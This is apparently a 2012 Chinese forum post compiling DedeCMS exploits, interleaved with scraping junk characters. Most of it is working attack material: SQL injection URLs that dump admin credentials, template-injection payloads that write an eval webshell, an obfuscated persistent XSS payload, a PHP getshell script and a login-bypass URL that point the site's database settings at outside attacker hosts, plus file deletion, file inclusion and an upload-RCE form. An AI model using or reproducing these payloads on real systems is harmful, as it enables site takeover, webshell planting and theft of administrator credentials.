dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞5 T* l; r1 i( f
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
* }6 ~& ^& a" }+ o3 M0 U( \+ K* I: P2 V" O5 p+ g) D3 C
' H; g/ O* k7 j5 `: T

) D. m5 D' J, F- i  |1 p$ z. O
7 s" `+ B, q# b: G: j/ ]% s4 |
: s! D! \% h9 {) n; s& L6 F/ g% T( p% n, `& K  |
4 ]& k" R9 Y$ T  J& }: z
, I) D7 k! ?; P3 ~  Z: x
DedeCms v5.6 嵌入恶意代码执行漏洞& F+ C7 x8 ~8 o7 a( C
注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
' k0 L0 N( t; Q7 x9 k发表后查看或修改即可执行
( f4 J  E. ?! K; }: E$ Xa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}+ v. d; Q8 c- p7 w6 Y6 w
生成x.php 密码xiao，直接生成一句话。5 P: f0 v: d7 N0 |: y* ~! ?

- o/ O* f" _) G( g( I. X8 E$ ~+ v, R/ I. [0 h9 z, @$ X" v

, [: K( E4 \# v  A  i1 P4 M9 K. l3 L& ]  P, j  g
9 J0 e! o1 F& ?; d
  I; z/ l* f* k
: {" \, Y3 K. G( r

: p9 `2 n) `" H  B6 Z: [Dede 5.6 GBK SQL注入漏洞+ H% \$ w" G2 W3 N+ ]- H
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';8 t/ h# l; U" V7 P
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
- _7 q0 [: W; |+ |http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ' l% B" ]( n+ {
1 @3 ^8 C/ C0 @  O& z

+ F. h5 i! \/ O
' q" O% b: |2 i% ~; w# r. d6 P1 Y
+ P2 D! j" x6 H* z" C& d4 }3 c" V9 X2 x
" O& r) R$ }# r3 F3 u: V+ o5 B
DEDECMS 全版本 gotopage变量XSS漏洞
2 w$ W5 x! c6 |. v$ \( ~1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。 : T; G9 A% L4 Q! ~" h. r% Z
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="- z4 z# E" Z  D: i
, b( D, a$ w. q( V9 F

! r# C0 I% `) j2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。 . u# O0 r. n6 @* k6 H
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell: Y9 L% w- Z" ?0 t
#!usr/bin/php -w0 w& d7 Z" T& b* R
<?php
8 X) n  V6 ?' N% c+ I3 Oerror_reporting(E_ERROR);
. y7 L8 X: [+ B# H9 ]set_time_limit(0);* P2 K' d% ~: e' p0 `. [- S
print_r('. k. `* y( x: E
DEDEcms Variable Coverage9 a: Y; l* k- Q; e* U) l
Exploit Author: www.heixiaozi.comwww.webvul.com
);: Y( T7 T1 a3 G4 F! e
echo "\r\n";# t8 a' X9 @8 J# \$ Z
if($argv[2]==null){! v! w+ y; p0 H% \5 c8 K" w1 ?6 W
print_r('
( I# b, K& a. e% J' g0 d4 G+---------------------------------------------------------------------------+; V% q- z4 v7 r
Usage: php '.$argv[0].' url aid path, f. g2 }$ [( i& ^! d
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
  g/ @6 f6 b# E) L+ G' \8 TExample:
( V+ M, Y' Q* lphp '.$argv[0].' www.site.com 1 old+ W- T8 V" V1 |  ~3 q
+---------------------------------------------------------------------------+: T7 Y3 J1 l1 e! A9 |4 O
');
* F; W3 v" S( P' Iexit;9 D4 r; k+ G+ ]; H5 G, c: c4 S
}( [4 `2 S! `. q% O
$url=$argv[1];
$ W/ |' \4 _7 L6 M) \, c7 I" b$aid=$argv[2];( V5 d' `/ h) s2 c% P/ A: @5 x9 a
$path=$argv[3];
' \# P" D1 q$ ]) u  r+ Y* ^: R: T$exp=Getshell($url,$aid,$path);
) N, }4 O. o2 ^+ n2 W3 P5 V. Lif (strpos($exp,"OK")>12){
4 f9 g6 B6 W6 p$ j. M( ]6 ^echo "
& }; E1 y1 P0 E, E$ uExploit Success \n";  c! |5 A" b. K2 P
if($aid==1)echo ") ~! w  l& `' y
Shell:".$url."/$path/data/cache/fuck.php\n" ;- A' n) Y1 r( c2 W2 j( v
5 t% L* w: T' B% ~$ O. A8 L5 N: I
: ]& }, W& ~5 Z5 l4 P2 y
if($aid==2)echo "
, \+ s6 [1 G$ k6 vShell:".$url."/$path/fuck.php\n" ;
! y" z8 s( p/ q/ i; O+ i) @3 j" c7 _% r* `
$ d, o1 M" [- V8 D2 K8 `
if($aid==3)echo "
# k1 L' _* a" ?Shell:".$url."/$path/plus/fuck.php\n";5 N- y0 O+ P% f3 Z0 f2 U. x

; m1 j7 L9 z7 u9 [% @" F: f/ `7 U, b# y; H) A- X9 C9 A( z5 }
}else{
3 F1 o  o+ _: E# [9 qecho "  U0 x0 e5 i% D0 q- N& P4 ~
Exploit Failed \n";
7 X. c. p- O( {2 ^8 V5 ?! q/ g) E, Y}% k$ E- S% b4 T, o* s
function Getshell($url,$aid,$path){2 D, r* g$ ^! b- }+ R  m4 X: C, S7 u
$id=$aid;/ I+ }0 j. D# H6 K: ?
$host=$url;4 Z3 Y; s1 f  L/ D- U
$port="80";4 p- }- {5 K3 A: ^
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
0 [4 v2 ~( [3 ?  O) G$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";/ c9 O" b' h2 j# j- _
$data .= "Host: ".$host."\r\n";. D  N9 \0 Y8 A& ?
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
4 w0 u2 i6 _6 e( b$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
! U1 u: o0 G' D( E" O" j$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
% d! n9 T' @- w8 y1 ]//$data .= "Accept-Encoding: gzip,deflate\r\n";$ `, X+ B9 V5 h* w# E9 x' K* F1 e
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";) d* u7 @3 L( O* b' E
$data .= "Connection: keep-alive\r\n";" S& T' o  n: s' k+ k& s
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";+ p, {* p) F% ~% g" r3 f7 w
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";3 O/ T1 L2 E3 i
$data .= $content."\r\n";8 C' j% Z0 e( i8 L0 I
$ock=fsockopen($host,$port);3 V/ {6 A% c4 P2 x. L2 |
if (!$ock) {
; G3 }" L4 v1 j. m- c( D3 mecho "+ ~9 [  _# Q) q5 ]0 b6 D* t0 ~  a
No response from ".$host."\n";
* b* p" C# w  |- q( X7 D. Y' n2 `}/ b& b* o. H1 a! X/ K
fwrite($ock,$data);
0 d; j' A0 ~5 ]0 ?) n( i$ W) pwhile (!feof($ock)) {
! y+ s4 y9 p5 p% c$exp=fgets($ock, 1024);
; e$ P" ]. j6 b4 ?return $exp;
7 y) r' z) N/ v3 z& G' i}' p3 Q- x$ v. k
}1 Q; h2 K  I; ~( C
% r% k- h5 J- Q, B  K

2 y1 Y& o/ V8 ~' R' s& G?>% ]4 P% l) i* C: m1 ?

) V! w$ W9 k$ I% [& k. \2 Y  Y' \7 P5 a; u8 m/ i# F

  t3 B: e4 `. T* h6 i
. a+ z% T0 I! |$ [! l. p; z" s7 a$ w; K5 Z# q! s8 P
; ^0 J6 @# X! A& z; J
- e& J6 ?5 t- ?1 t

2 i9 }* C( H1 V# E4 k! X
' \9 X  u9 h' n; B6 t
& l; d1 I$ p2 s4 C. aDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)' P7 u0 ~6 E8 z8 S! e4 L' f
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
* M4 B  m* U/ b1 x! J3 _- E6 x0 T: X2 ]$ o6 |6 A8 u

- `7 L, J! B6 c3 {( l把上面validate=dcug改为当前的验证码，即可直接进入网站后台. r  a5 d% J0 L# F

$ G4 ^% B2 G- {) Z7 l$ N此漏洞的前提是必须得到后台路径才能实现3 r/ a: [4 n$ Z2 ~" z! b# K
2 v# N. |! o: R# c* v
" w+ k1 o' J; D& c4 s9 i  F+ R# m

9 M0 O- [$ A* W, N! x! ?7 g9 H$ u1 f! N6 E
- l" g! u7 H% D( F

0 C9 S% I) Z7 z# r. f- B5 v% r$ h) h: \4 s  P) x

# c2 N2 }' P7 T2 }  S. o2 m
4 q3 `1 j. a5 A8 }& Q
7 z& W1 ~1 O) |5 v; @1 |6 j1 t9 qDedecms织梦标签远程文件写入漏洞
6 L* m1 [/ j* z* O0 e+ N前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
. l/ U& `5 `% l0 C7 ^
: D+ G& F# `+ J0 X& E4 W7 U3 y; w; o# G0 D# _
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。 8 u- ^  P& Y9 X, E; X: @
<form action="" method="post" name="QuickSearch" id="QuickSearch">' v! w: j$ T% v" o, A
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
' y' K' _6 M5 T  r<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />4 b7 _# P2 F  {8 ?
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
$ C. o* C: {' F4 r. f( C<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
$ q3 S9 J# X% ^/ B! u<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />( e# e" J; A" W% B( l# v
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />* I  U8 V1 r! N: C9 n* J% ]0 `
<input type="text" value="true" name="nocache" style="width:400">
) E& c4 ]- y# K% Z  N4 }% O: n<input type="submit" value="提交" name="QuickSearchBtn"><br />( k4 ]7 e# D1 L/ s0 V9 m
</form>
/ G+ S, f& W3 G' B! z<script>+ E4 C' z8 ^6 t: I
function addaction(); j) Y( f$ X% T# M
{
# Q3 b4 r, @- b; D  U" vdocument.QuickSearch.action=document.QuickSearch.doaction.value;
4 o6 a; }9 u  g}
9 H% a: O7 R" T( y</script>
& O5 r% H* H# R9 |
( X7 r: g' G; n
+ f  T% G/ @% d& N
, i; e' T6 T1 L+ n7 E: M9 ]9 i: q6 c/ U1 d3 x) E) |

( w# V9 ~4 \! Y$ X' F+ H* o$ G1 h- C; `& ^# w' Q0 n/ ?. B

9 m; O" \  P8 S7 A: h- B$ R( N! B, o2 @7 c% l. e' [0 Q

! X6 o; M* g; g; ^5 S4 S% |# j# G. l1 e! @# O$ s
DedeCms v5.6 嵌入恶意代码执行漏洞0 p, G" c) l( g/ u, l  S1 m. f
注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行6 u( W' u( V; R; \1 U5 S. ?) r
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
( ?4 m. ~5 r$ S. c! t  P9 y; s生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得
4 k* t$ ~' Q) r$ A- R- T+ O2 XDedecms <= V5.6 Final模板执行漏洞5 o& _+ I5 u6 u! i2 S. r5 {6 n
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
1 B, `! h9 V% muploads/userup/2/12OMX04-15A.jpg  d* y9 j, L3 \
% e9 p/ I) c/ V+ A5 J$ b

$ Z/ M: t) u5 ]6 }8 P1 q模板内容是（如果限制图片格式，加gif89a）：
8 q0 L: `. x9 I{dede:name runphp='yes'}7 B+ K/ [# ~2 P) z8 M8 p7 Q. `
$fp = @fopen("1.php", 'a');6 c; C# c: N. C* a' ^: _
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
, a1 e- K; n! k& b' s1 I% J0 S@fclose($fp);
" W) Z9 O7 D) a5 n{/dede:name}
( }' Y' O2 T/ Z$ S' m' U5 F2 修改刚刚发表的文章，查看源文件，构造一个表单：
" P: H0 @- g3 S$ \<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">% ^! Z- E% H; C% T7 ]
<input type="hidden" name="dopost" value="save" />& t& q( |; M) E. Q' ?
<input type="hidden" name="aid" value="2" />% k! |- K9 ]' F) p6 D3 n
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
& ]! k1 ]% l$ R1 O* w<input type="hidden" name="channelid" value="1" />; s6 \$ |: d7 O/ ]4 V
<input type="hidden" name="oldlitpic" value="" />
! O4 v' F/ `' c<input type="hidden" name="sortrank" value="1275972263" />+ U4 k: @: e+ K& e6 n- C
' k0 w( \. a* v" R

5 Y% ?4 w3 w( t$ g<div id="mainCp">
5 p7 \& j: [. n! G<h3 class="meTitle"><strong>修改文章</strong></h3>4 t- N- W- J* E2 L7 n& s

9 I2 J0 {# H5 J! V. o
% j# o" I0 L& o/ x' F' _( ]<div class="postForm">- T, c5 p/ Z: m6 B
<label>标题：</label>- K" v  t+ q% p& ^' e8 X1 y2 _1 ?
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>* r& L5 N% j- D0 ?- M) M
% C8 L. o. U8 C6 S, L1 Q/ t' g

& H. N" n/ z" v; [<label>标签TAG：</label>
  j" B% g1 m6 z$ u5 t* z<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
7 x2 Q' a' p$ _' F& O2 X8 o9 O( H- |
- s3 ^- M* V( ]$ j/ Y, r
<label>作者：</label>: t+ b! J$ O( B7 J8 J! Y) K
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
+ c' ]  }2 e4 i5 Y" U3 U
+ O# ?( d! E& E* n1 G4 W' Q; j
# e6 @& K7 s0 Y6 n4 G<label>隶属栏目：</label>& ]- x& p0 b2 R" z3 w
<select name='typeid' size='1'>7 t  `4 k1 [, r5 o+ N
<option value='1' class='option3' selected=''>测试栏目</option>
% u2 ^6 @8 H/ v( ?0 V. i& X</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)8 w6 r* A; n/ O4 J6 n

9 I, P4 Z! {% K
+ k" J! q2 e( G- m<label>我的分类：</label>1 S) r; ?" t8 [0 t! s" a
<select name='mtypesid' size='1'>
7 D% S' f# A3 a8 H) b5 t<option value='0' selected>请选择分类...</option>$ w/ H; ^4 d1 h# V
<option value='1' class='option3' selected>hahahha</option>, X' u2 N! C2 ]! T, D
</select>: x2 S. P: {) L' ^) X2 Y" y

9 p1 y2 o$ G; G
3 R- Q; G) V7 n" C$ v<label>信息摘要：</label>8 w! T+ Q& k5 y8 ]- x1 y, k
<textarea name="description" id="description">1111111</textarea>
) l1 @% Z$ H4 |+ Y0 K. u(内容的简要说明)
. L' D& i; q6 P6 U( {, N
& }, ~( @8 l9 g. U$ W7 y6 N+ v- r! r! W/ H4 t8 i* E
<label>缩略图：</label>2 S" U5 L' q6 t7 S
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>2 b' I6 U. a+ V3 ?0 b7 f: r# q+ }
) E5 s5 T0 N) G. Y' S- t; \) W' v' X5 w' P

* v* }5 B* f& z$ d( n, U<input type='text' name='templet'
$ C5 E% P* u7 K3 m$ r5 }' C& H% rvalue="../ uploads/userup/2/12OMX04-15A.jpg">8 k7 Y! H/ c/ O# i3 m/ a# {/ k7 Z
<input type='text' name='dede_addonfields'5 w, m+ m2 {  v6 _( [$ I; g4 T
value="templet,htmltext;">（这里构造）2 u$ \  J6 B; c9 J4 i
</div>$ ?% e3 C# i3 Z" S

, V6 V1 U& ]+ h: Z( `& c
' [" {' h! F4 F& L& g9 r* X7 V6 H
/ {/ _! y& S7 [9 E8 P( k7 U<h3 class="meTitle">详细内容</h3>
0 `5 g% ?! N, c. B9 ~0 h* l+ P$ \5 a6 `! N% U0 i: }- V2 |

) y4 D5 G2 m0 P" x+ `; s. x( q8 L( h<div class="contentShow postForm">% l8 k  J0 F% R# ]( s
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
$ C- v5 b1 Q& m6 M% n9 S- }5 V- O# b9 v8 Y+ l  A* j
+ i! F5 @' f# `
<label>验证码：</label>
9 @5 }: a# n9 ~/ ?9 B1 F9 f<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
! L" Z# S8 Y5 A: g' [<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
; r, M' n; Q7 Y" W: Q7 X9 J7 q' e, Q) w4 @: {

0 N3 p3 U6 j& M% t% f, O1 N. P<button class="button2" type="submit">提交</button>& u5 a4 l# c6 ]% f6 q' a% g
<button class="button2 ml10" type="reset">重置</button>
4 V$ F. S1 S7 R, @/ Z5 w, ]</div>0 f" C3 ?& y$ x7 {
! T: D3 x7 Q+ a- e; S3 V
/ I$ g6 S4 s! S$ X  r. T
</div>
) f* s5 N4 F0 A5 l: @2 C1 y* |8 c3 ?0 Q1 t% s
3 i# o" @9 A$ }: E8 e
</form>
# s+ r1 W: l/ p8 P' d; [- d  R+ q4 [1 ]' i0 T# W; y* t) \4 M

# z) y  n! h" Q' N/ W! l提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：2 `( ?# K& z7 ^% }& ]7 G
假设刚刚修改的文章的aid为2，则我们只需要访问：
- T) R+ M0 n2 K- o5 s/ m( `! Y  mhttp://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php& K! W* G4 h* B: P# X& b3 n" ]

3 c" H" b" d. {8 _3 |# a5 R
$ H7 F  J( ]7 ]
  O! ^" m2 L7 q; B; K/ I& x' e& S( Y9 E3 t
) a1 ^2 u6 D- @. [) L+ {+ R
; P# X& R+ ^1 Y
- t. O) W1 `) d) K
" f* t* \0 d: J# R% n5 s
' n% \$ v8 P3 K) j: i0 |: a  k
% z# @( p; Q1 I. }3 u

, i2 b: L, G0 @* m+ }1 q# h2 K& n
1 `+ ]- y* s8 mDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)$ i% K) \) ~5 R- V  ?. s( E7 Q" j% W6 w
Gif89a{dede:field name='toby57' runphp='yes'}5 Y( h* `/ D5 g3 n/ G
phpinfo();
# N  ]1 p% }$ ]3 x{/dede:field}) o5 b2 y0 j3 A5 Z  S2 K. B
保存为1.gif
! B) S2 D" l1 z5 S6 J<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
" ?# k1 W0 s: G) j<input type="hidden" name="aid" value="7" />
& B% V8 Q5 o+ J<input type="hidden" name="mediatype" value="1" />
- n; m4 M& t& N+ s<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> - o4 @5 X& X/ t/ N) |# t
<input type="hidden" name="dopost" value="save" />
4 O8 s: r: a: l6 R' b  ^# Z4 n7 h<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
$ x' @) w' |' Q. I1 S<input name="addonfile" type="file" id="addonfile"/>
' \* F! n, c9 C% E* A; Z<button class="button2" type="submit" >更改</button>
/ i7 b6 w% ?( ~  z' A2 v. a5 C</form>
% u+ c2 O* U* M2 D2 ~0 @6 X) H% T- d* A! n: t' q& w  D  ?+ x+ F

; B0 L; F% g( O' H构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
发表文章，然后构造修改表单如下：
2 h. o$ a: |: C0 H( B) J5 K( o, |. l9 `9 v, a0 m

6 K. T, }) f$ H9 v" I! n$ M: V<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> $ [  v8 v, c6 k
<input type="hidden" name="dopost" value="save" />
6 q* p. F* {" A+ C- j5 Y+ K<input type="hidden" name="aid" value="2" />
  ~( ]9 y9 x: T3 P" [<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 8 e! a7 r3 r2 [" g( x  H' q
<input type="hidden" name="channelid" value="1" />
' J' P5 q: A# l6 }- X<input type="hidden" name="oldlitpic" value="" />
9 i+ |* h8 t) M, X<input type="hidden" name="sortrank" value="1282049150" />
5 Q  L/ q% V# `$ B+ N<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> % }; A1 ^) X6 u# h( X
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
! z  H8 o% [/ S, L5 [; ^% ~<select name='typeid' size='1'>
" C* K3 h& [/ M6 w<option value='1' class='option3' selected=''>Test</option> 5 R) A5 H  Y7 O7 H& \6 y" p/ h
<select name='mtypesid' size='1'>
8 E8 t% s) A- k% U1 j<option value='0' selected>请选择分类...</option> 5 C5 _% Q, ]3 F' u
<option value='1' class='option3' selected>aa</option></select>
( \. D" r0 R- `- f( E<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
7 U: q* h6 i+ \& c. F/ [<input type='hidden' name='dede_addonfields' value="templet">
. Y( h  b) ]  J, R4 e5 E3 y<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
& ?- g: i1 s$ C* ]; b* k* |/ m<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
7 I' ~5 p1 @4 ^% k<button class="button2" type="submit">提交</button>
: @* c: a7 A- [( P$ u* ~0 p</form>3 x1 B; S$ X3 P6 Z. S" e

# B4 W$ g0 B2 }) r0 \
; K) C. j9 W2 [5 s- D4 U6 A  h
4 D; L5 J& d. ~5 H+ i8 k# M3 ]
" q' ~+ _* Q0 R: m5 K) W" k  }) w: w# P$ |1 k1 l

' O1 r( j! z$ r( X
; F9 P: V; R3 |8 r! F3 U$ \2 e, I4 N$ U$ T& B3 g% @/ }+ j9 l

/ d6 w8 x. Q0 ^$ ~. L: w! Z; v
' P) b8 B* H5 V* P" r$ N6 p# t) D: A6 `) x
! n* V: K, t2 j6 w) O* T
织梦(Dedecms)V5.6 远程文件删除漏洞
$ ~! {' r0 @3 U# ~5 P+ g7 Xhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 ' }2 Z4 W( n3 W5 ?: H3 _( K
http://www.test.com/plus/carbuya ... urn&code=../../
5 e$ L" V7 l3 F8 X1 k6 z0 F- N2 p% `

& \  \. P6 ^5 Q+ e% O* [: z  a% g8 [  w+ W) d" O

, O. l" J( r, a9 w
$ P1 H& ~* S5 j$ m# z" r* e8 i, P3 F% ~1 S6 ]. N* Y

# R8 a: s: o- \2 X1 k+ o2 @
+ f; _* |0 j9 q$ t
; E0 X: ~. T" Z. q
- S6 y) @* F; [/ [. cDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 - z: ^9 ~1 M: I$ o
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`4 X( B; Y& E1 O
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5/ f2 U2 F; \' K, p
8 |( a# f! `  }1 g, D
, @5 g5 n6 {+ R
) N2 l* X+ z& o4 v

$ ]: w7 y% j% L. p, `0 T' `4 V( [: v# y0 K7 Z; R9 q
! ?$ q% F6 w0 q" T# Q
4 {5 C* ]! e; \( u' x
- E( o+ l0 W( d- t$ Y$ {/ r
/ k9 X1 t7 ]) v6 A; o3 x( N
/ ~6 e" W8 N: v
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞* f$ z2 N5 D, o4 G% I# E% N
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
  B3 b' R# M, F9 m3 R3 `7 P8 E/ @! w: {$ Y

- L9 x7 N7 q% R/ K& ?/ i2 j  A8 d2 h) Q5 N! ?, `! n7 Z, z

2 x4 _; A4 ?; f0 f; W; K6 ?9 _
7 }7 T& |# `- H, ?
; O5 O! d  P6 s

0 u  A: a2 n& D& K
( m6 [6 U& V& W5 Z* O8 ]8 K. i  l
. _& M- _9 d0 `- w织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
4 \8 a, v' }5 D4 Y<html>
6 y* [( y- M! J0 ?" ?3 R<head>* K% `# Y4 a; c: |+ f2 J
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
8 U- `& `9 \. d1 P4 }" C</head>
: @6 d9 S3 D1 m<body style="FONT-SIZE: 9pt">; D+ y- B4 d: c1 K9 Z7 @# a
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
( a. w: l3 q) G0 l2 X' g# I5 _<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
+ d. E8 H" w1 }<input type='hidden' name='activepath' value='/data/cache/' />
- A) K4 T  f+ d6 Y4 j! h5 @/ }<input type='hidden' name='cfg_basedir' value='../../' />) d; K9 m9 s" v( c9 Z* T
<input type='hidden' name='cfg_imgtype' value='php' /># T6 E$ z9 g+ P/ [; B, N
<input type='hidden' name='cfg_not_allowall' value='txt' />
/ o% Q+ f1 j- M% F1 L<input type='hidden' name='cfg_softtype' value='php' />
1 r7 `: {1 g* r; i<input type='hidden' name='cfg_mediatype' value='php' />1 D( j6 i( h' X, m: P2 ]  H1 L
<input type='hidden' name='f' value='form1.enclosure' />; u  s6 Y4 ^5 K5 z; `1 L7 |
<input type='hidden' name='job' value='upload' />
